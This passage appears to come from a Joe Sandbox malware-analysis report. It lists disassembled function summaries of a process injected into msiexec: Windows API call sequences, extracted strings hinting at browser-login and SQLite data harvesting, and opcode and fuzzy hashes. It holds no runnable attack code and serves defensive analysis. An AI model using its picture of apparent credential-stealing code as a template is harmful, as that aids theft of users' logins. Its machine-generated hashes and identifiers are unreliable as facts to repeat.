                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                • String ID: 3A
                                                                                • API String ID: 3300951397-293699754
                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                • String ID: strings
                                                                                • API String ID: 3166385802-3030018805
                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041249C
                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: BIN
                                                                                • API String ID: 1668488027-1015027815
                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                • String ID: AE$.cfg$General$EA
                                                                                • API String ID: 776488737-1622828088
                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                • memset.MSVCRT ref: 0040D906
                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 1028950076-4169760276
                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: -journal$-wal
                                                                                • API String ID: 438689982-2894717839
                                                                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Dialog$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3975816621-0
                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                • API String ID: 1214746602-2708368587
                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                • memset.MSVCRT ref: 00405E33
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                • String ID:
                                                                                • API String ID: 2313361498-0
                                                                                • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                • String ID:
                                                                                • API String ID: 2047574939-0
                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                • String ID:
                                                                                • API String ID: 4218492932-0
                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                APIs
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: gj
                                                                                • API String ID: 438689982-4203073231
                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                • API String ID: 3510742995-2446657581
                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscat
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 384018552-4153097237
                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2029023288-3849865405
                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                APIs
                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                • memset.MSVCRT ref: 00405455
                                                                                • memset.MSVCRT ref: 0040546C
                                                                                • memset.MSVCRT ref: 00405483
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                • String ID: 6$\
                                                                                • API String ID: 404372293-1284684873
                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                                • String ID:
                                                                                • API String ID: 1470729244-0
                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                • String ID:
                                                                                • API String ID: 1331804452-0
                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                APIs
